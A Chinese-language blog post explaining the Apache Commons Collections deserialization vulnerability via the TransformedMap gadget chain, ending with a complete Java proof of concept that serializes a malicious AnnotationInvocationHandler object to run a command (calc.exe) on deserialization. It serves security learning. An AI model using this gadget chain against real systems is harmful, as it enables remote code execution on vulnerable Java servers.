Apache commons-collections反序列化漏洞(TransformedMap利用链)

最新推荐文章于 2024-06-13 15:21:00 发布
最新推荐文章于 2024-06-13 15:21:00 发布
阅读量450 收藏
点赞数
分类专栏: java安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43936524/article/details/115519583
版权

文章目录

Commons-collections概述

官网对Commons-collections的说明

Java commons-collections是JDK 1.2中的一个主要新增部分。它添加了许多强大的数据结构,可以加速大多数重要Java应用程序的开发。从那时起,它已经成为Java中公认的集合处理标准。

Commons-collection是一个基本的数据结构包,他封装拓展了Java基础Collection中的数据结构,而形成反序列化的数据结构是一个叫TransformedMap的一个Map结构的拓展。它实现了每次Map中元素发生改变时自动进行一些逻辑处理,而处理的逻辑由transformer函数定义,该函数在TransformedMap实例化时通过参数传入。

InvokerTransformer反射触发

Transform接口有三个实现类,最后的构造也是通过这些实现类来完成。首先来看下transform的一个重要实现类InvokerTransformer的部分代码

public class InvokerTransformer implements Transformer, Serializable {
    static final long serialVersionUID = -8653385846894047688L;
    private final String iMethodName;
    private final Class[] iParamTypes;
    private final Object[] iArgs;
    
    public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        this.iMethodName = methodName;
        this.iParamTypes = paramTypes;
        this.iArgs = args;
    }
    
    public Object transform(Object input) {
        if (input == null) {
            return null;
        } else {
            try {
                Class cls = input.getClass();
                Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
                return method.invoke(input, this.iArgs);
            } catch (NoSuchMethodException var5) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
            } catch (IllegalAccessException var6) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
            } catch (InvocationTargetException var7) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
            }
        }
    }
}

通过上述代码可以看出InvokerTransformer是Transformer的一个实现类,其构造方法中传入了三个可控参数分别为methodNameparamTypesargs分别对应了方法名,参数类型和参数,而重写的Transform方法为通过反射机制执行传入的函数以及参数。

由于我们最终的目的为执行任意函数,也就是执行Runtime.getRuntime().exec("Calc.exe")语句,那我们首先使用InvokerTransform来实现这一目标,后续再考虑如何触发的问题。

// 创建实例 传入构造方法参数 (函数名 参数类型 参数值)
InvokerTransformer invokerTransformer = new InvokerTransformer(
        "exec",
        new Class[]{String.class},
        new String[]{"Calc.exe"}
);
// 通过反射机制依次获得Runtime类 getRuntime构造方法 最后生成Runtime实例 
Object input = Class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(Class.forName("java.lang.Runtime"));
// 执行transform函数
invokerTransformer.transform(input);

代码的内容为:

  • 创建InvokerTransformer实例并传入想要执行的函数名,参数类型和参数值
  • 通过反射机制得到Runtime实例作为transform函数的输入对象
  • 调用transform函数

发现可以成功弹出计算器
目前通过InvokerTransformer类已经可以实现反射执行命令的效果,不过需要两个前提条件,第一需要一个Runtime的实例作为input参数,第二需要主动调用transform函数,显然在服务端是不可能完成这两个条件的,所以接下来的问题就是如何自动传入构造的input并自动触发transform函数

ChainedTransformer遍历触发

同样先看下ChainedTransformer的主要代码

public class ChainedTransformer implements Transformer, Serializable {
    static final long serialVersionUID = 3514945074733160196L;
    private final Transformer[] iTransformers;
    public ChainedTransformer(Transformer[] transformers) {
        this.iTransformers = transformers;
    }

    public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }

        return object;
    }

    public Transformer[] getTransformers() {
        return this.iTransformers;
    }
}

其中重写的transform方法为一个循环,遍历传入的transform数组,依次调用数组中每个元素的transform方法,并将每次调用返回的结果Object当作下次调用的输入。从这里就可以联想到上一个InvokerTransformer我们的需求之一就是自动传入构造的input,并自动触发。而ChainedTransformer刚好满足了这个需求。

接下来来构造ChainedTransformer的利用链。
这里利用链的构造用到了另外一个Transformer的实现类ConstantTransformer,不过这个实现类非常简单,简单来说就是实例化传入一个Object,transform函数会返回这个传入的Object。代码如下所示

public class ConstantTransformer implements Transformer, Serializable {
    static final long serialVersionUID = 6374440726369055124L;
    public static final Transformer NULL_INSTANCE = new ConstantTransformer((Object)null);
    private final Object iConstant;

    public static Transformer getInstance(Object constantToReturn) {
        return (Transformer)(constantToReturn == null ? NULL_INSTANCE : new ConstantTransformer(constantToReturn));
    }

    public ConstantTransformer(Object constantToReturn) {
        this.iConstant = constantToReturn;
    }

    public Object transform(Object input) {
        return this.iConstant;
    }

    public Object getConstant() {
        return this.iConstant;
    }
}

最终构造的利用链为:

Transformer[] transformers = new Transformer[]{
        // 获得Runtime类对象
        new ConstantTransformer(Runtime.class),
        // 传入Runtime类对象 反射执行getMethod获得getRuntime方法
        new InvokerTransformer(
                "getMethod",
                new Class[]{String.class,Class[].class},
                new Object[]{"getRuntime",new Class[0]}
                ),
        // 传入getRuntime方法 反射执行invoke方法 得到Runtime实例
        new InvokerTransformer("invoke",
                new Class[] {Object.class, Object[].class },
                new Object[] {null, null }
                ),
        // 传入Runtime实例 执行exec方法
        new InvokerTransformer("exec",
                new Class[] {String.class },
                new Object[] {"Calc.exe"})
};

此利用链所对应的反射语句为

((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("calc.exe");

此时的ChainTransformer为:

ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
chainedTransformer.transform(null);

执行transform成功弹出计算器。
通过ChainedTransformer解决了InvokerTransformer构造input并输入的问题,现在服务端只需要触发transform方法即可

封装为TransformedMap

TransformedMap类实例化的过程中需要传入一个map和一个Transformer,每当TransformedMap中的元素产生变化时(添加,删除,修改)就会触发传入的Transformertransform方法。这样我们的触发条件就由服务端调用transform方法变为map中有元素发生改变。

public Object put(Object key, Object value) {
    key = this.transformKey(key);
    value = this.transformValue(value);
    return this.getMap().put(key, value);
}

可以看出每次调用put都会调用transformKeytransformValue

protected Object transformKey(Object object) {
    return this.keyTransformer == null ? object : this.keyTransformer.transform(object);
}

protected Object transformValue(Object object) {
    return this.valueTransformer == null ? object : this.valueTransformer.transform(object);
}

而这两个函数值valueTransformer,keyTransformer都是可控的

Transformer[] transformers = new Transformer[]{
        // 获得Runtime类对象
        new ConstantTransformer(Runtime.class),
        // 传入Runtime类对象 反射执行getMethod获得getRuntime方法
        new InvokerTransformer(
                "getMethod",
                new Class[]{String.class,Class[].class},
                new Object[]{"getRuntime",null}
        ),
        // 传入getRuntime方法对象 反射执行invoke方法 得到Runtime实例
        new InvokerTransformer("invoke",
                new Class[] {Object.class, Object[].class },
                new Object[] {null, null }
        ),
        // 传入Runtime实例 执行exec方法
        new InvokerTransformer("exec",
                new Class[] {String.class },
                new Object[] {"Calc.exe"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

Map innermap = new HashMap();
innermap.put("value","value");
Map outermap = TransformedMap.decorate(innermap,null,chainedTransformer);

经过TransformedMap封装后服务端触发条件从执行chainedTransformer的Transform方法变为对TransformedMap中key or value的修改

寻找ReadObject触发点

AnnotationInvocationHandler触发(JDK1.7)

在jdk1.7中AnnotationInvocationHandler类重写了ReadObject方法

private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
    var1.defaultReadObject();
    AnnotationType var2 = null;

    try {
        var2 = AnnotationType.getInstance(this.type);
    } catch (IllegalArgumentException var9) {
        throw new InvalidObjectException("Non-annotation type in annotation serial stream");
    }

    Map var3 = var2.memberTypes();
    Iterator var4 = this.memberValues.entrySet().iterator();

    while(var4.hasNext()) {
        Entry var5 = (Entry)var4.next();
        String var6 = (String)var5.getKey();
        Class var7 = (Class)var3.get(var6);
        // 触发setValue函数
        if (var7 != null) {
            Object var8 = var5.getValue();
            if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
            }
        }
    }

其中遍历传入的Map,也就是上文构造的TransformedMap,然后执行setValue函数var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));成功触发恶意的transform函数。

完整的POC

public class poc {
    public static void main(String[] args) {
        try {
            Transformer[] transformers = new Transformer[]{
                    // 获得Runtime类对象
                    new ConstantTransformer(Runtime.class),
                    // 传入Runtime类对象 反射执行getMethod获得getRuntime方法
                    new InvokerTransformer(
                            "getMethod",
                            new Class[]{String.class,Class[].class},
                            new Object[]{"getRuntime",null}
                    ),
                    // 传入getRuntime方法对象 反射执行invoke方法 得到Runtime实例
                    new InvokerTransformer("invoke",
                            new Class[] {Object.class, Object[].class },
                            new Object[] {null, null }
                    ),
                    // 传入Runtime实例 执行exec方法
                    new InvokerTransformer("exec",
                            new Class[] {String.class },
                            new Object[] {"Calc.exe"})
            };

            ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

            Map innermap = new HashMap();
            innermap.put("value","value");
            Map outermap = TransformedMap.decorate(innermap,null,chainedTransformer);
			// 构造包含恶意map的AnnotationInvocationHandler对象
            Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
            Constructor cst = cl.getDeclaredConstructor(Class.class,Map.class);
            cst.setAccessible(true);
            Object exploitObj = cst.newInstance(Target.class,outermap);

            // 序列化
            FileOutputStream fos = new FileOutputStream("object");
            ObjectOutputStream oos = new ObjectOutputStream(fos);
            oos.writeObject(exploitObj);
            oos.close();

            // 反序列化
            FileInputStream fis = new FileInputStream("object");
            ObjectInputStream ois = new ObjectInputStream(fis);
            Object result = ois.readObject();
            ois.close();
            System.out.println(result);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

成功执行
在这里插入图片描述
JDK8后更改了AnnotationInvocationHandlerreadObject的写法,取消了setValue的使用,新建了LinkedHashMap来储存值。

kit_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Java反序列化漏洞Apache Commons Collections
m0_61506558的博客
08-08 782
CC对JDK标准库的集合类进行了扩展,添加了一些数据结构,并且提供了工具类2015年1月28日,有两个黑客发现了CC的漏洞利用2.2 源码分析transform()方法可以通过反射机制来进行任意函数的调用通过式调用,实现InvokeTransformer方法的自动触发1、对利用类进行序列化,然后交给Java程序反序列化2、在进行反序列化时,会执行方法,该方法会用setValue对成员变量的Value值进行修改3、value修改触发了。......
commons-collections4-4.1
11-01
总的来说,Apache Commons Collections 4.1是针对Java反序列化漏洞的重要更新,它提升了库的安全性,并可能包含其他改进。对于任何使用Apache Commons Collections的Java应用来说,升级到这个版本都是必要的,以保护...
Javaweb安全——反序列化漏洞- CC1
weixin_43610673的博客
05-24 1191
Common-Collections利用1 第一次接触反序列化漏洞时写的初识Java反序列化漏洞这篇文章当中已经分析过一遍Common-Collections的两条子(分别用的TransformedMap和LazyMap构造恶意对象反射,AnnotationInvocationHandler(CC1)和BadAttributeValueExpException(CC5)调用transform())。这次从Common-Collections1开始再捋一遍,顺便自己写一遍exp加深印象。 本文环境为jd
JAVA 反序列化Apache Commons Collections 反序列化漏洞分析
辛勤搬砖的门卫的专栏
03-01 1900
Apache Commons Collections 反序列化漏洞研究
Java工具库系列(十六):Apache Commons Collections
最新发布
阿里渣渣java研发组-群主
06-13 556
Apache Commons CollectionsApache Commons 项目的一部分,专注于提供增强的集合类和实用工具。新的集合类型(如BagMultiMapBidiMap高效的集合操作工具强大的集合装饰器Apache Commons Collections 是一个功能强大的工具库,通过提供丰富的集合类和实用方法,极大地简化了 Java 应用程序中的集合操作。在本篇文章中,我们介绍了 Commons Collections 的核心功能和使用方法。
【入坑JAVA安全】手把手教你写反序列化POC
一个安全研究员
04-15 1949
要是你是妹子就更好了~
Java安全研究——反序列化漏洞之CC
weixin_43889136的博客
04-13 4070
0x01前言 apachecommons-collections组件下的反序列化漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03反序列化漏洞 序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
commons-collections-3.2.2-
11-01
总的来说,Apache Commons Collections 3.2.2的更新对于任何使用WebLogic服务器和此库的项目来说都是至关重要的,因为它解决了可能导致严重安全风险的反序列化漏洞。通过正确地替换和配置,我们可以确保系统的稳定性...
Java反序列化漏洞利用工具的实现共5页.pdf.zip
11-23
例如,Apache Commons Collections库曾被发现存在一个著名的反序列化漏洞,攻击者可以通过构造特定的输入来执行任意代码。这种情况下,利用工具可以帮助复现攻击,以验证系统的脆弱性。 在实际应用中,防御Java...
commons-collections-3.2.2、4-4.1
11-07
修复weblogic反序列化漏洞,修复方法为:替换原来的common-collections组件,建议:原来是3.2.d就替换为3.2.2,原来是4.x,就替换为4.4.1,如果出现不兼容,则替换一个版本试试。 1.先停止weblogic 2.替换oracle\...
Java反序列化漏洞利用工具的实现.zip
10-16
本资料“Java反序列化漏洞利用工具的实现.zip”包含了一个PDF文档,很可能是详细介绍如何利用Java反序列化漏洞的教程。通常,这样的文档会涵盖以下几个关键知识点: 1. **Java序列化机制**:解释Java对象序列化的...
Lib之过?Java反序列化漏洞通用利用分析
weixin_34259159的博客
11-14 436
2019独角兽企业重金招聘Python工程师标准>>> ...
手把手教你写JAVA反序列化的POC
Ms08067安全实验室
07-20 2018
0x01 前言前面,我们了解了java的序列化机制,也知道在什么情况下会出现漏洞,为了对反序列化漏洞有个更直观的认识,这里就来说一说存在于apache commons-collectio...
6-java安全——java反序列化漏洞利用
网络安全
07-01 4047
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
commons-collections使用介绍之Map
蒋固金(jianggujin)的专栏
04-07 9622
介绍完了List,我怕们继续来看commons-collections中为我们提供的Map相关的实现类。
谨慎使用Scala Map的mapValues, 你需要的可能是transform
热门推荐
Laurence的技术博客
05-01 1万+
没有踩过mapValues的坑之前,我相信大多数人会认为mapValues和所有其他map类方法的逻辑是一样的:对Map里所有的value施加一个map函数,返回一个新的Map。但实际情况却并不这么简单,还是先看一段“诡异”的代码吧 (本文原文出处: 本文原文接: http://blog.csdn.net/bluishglc/article/details/80156218 转载请注明出处。):...
apache commons-collections 反序列漏洞分析
谭宇
06-19 713
在这里只记录下对jdk1.8可用的apache commons-collections中执行任意类任意执行方法,实际程序代码与原作者相同,想知道更多分析思路,请参考原文 环境 jdk1.8 commons-collections-3.2 完整程序 import org.apache.commons.collections.Transformer; import org.apache.common...
Java反序列化漏洞学习---Apache Commons Collections
gental_z的博客
10-11 919
Java反序列化漏洞学习—Apache Commons Collections 第一次接触Java安全~~~~ Apache Commons CollectionsApache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections中有一个InvokerTransformer实现了Transformer接口,主要作用为调用Java的反射机制来调用任意函数。 影响组件版本:
JAVA Apache-CommonsCollections 序列化漏洞分析以及漏洞高级利用
weixin_34161083的博客
11-13 388
为什么80%的码农都做不了架构师?>>> ...
Apache Commons-HTTPClient组件详解与应用
要使用Apache Commons-HTTPClient,首先需要下载其核心库文件`commons-httpclient-3.1.jar`。这个库文件可以从Apache的官方网站获取。在实际项目中,可能还需要依赖其他Apache Commons库,例如`commons-logging.jar`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值